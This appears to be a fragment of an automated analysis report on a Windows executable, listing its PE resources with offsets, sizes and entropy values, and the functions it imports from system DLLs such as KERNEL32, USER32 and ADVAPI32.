                          RT_ICON | 0x48488 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.35204918032786886
                          RT_ICON | 0x48e10 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.2098375451263538
                          RT_ICON | 0x496b8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.1842485549132948
                          RT_ICON | 0x49c20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4512411347517731
                          RT_DIALOG | 0x4a088 | 0x144 | data | English | United States | 0.5216049382716049
                          RT_DIALOG | 0x4a1d0 | 0x13c | data | English | United States | 0.5506329113924051
                          RT_DIALOG | 0x4a310 | 0x100 | data | English | United States | 0.5234375
                          RT_DIALOG | 0x4a410 | 0x11c | data | English | United States | 0.6056338028169014
                          RT_DIALOG | 0x4a530 | 0xc4 | data | English | United States | 0.5918367346938775
                          RT_DIALOG | 0x4a5f8 | 0x60 | data | English | United States | 0.7291666666666666
                          RT_GROUP_ICON | 0x4a658 | 0x76 | data | English | United States | 0.6864406779661016
                          RT_VERSION | 0x4a6d0 | 0x2d0 | data | English | United States | 0.5055555555555555
                          RT_MANIFEST | 0x4a9a0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
| DLL | Import |
| --- | --- |
| KERNEL32.dll | Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar |
| USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |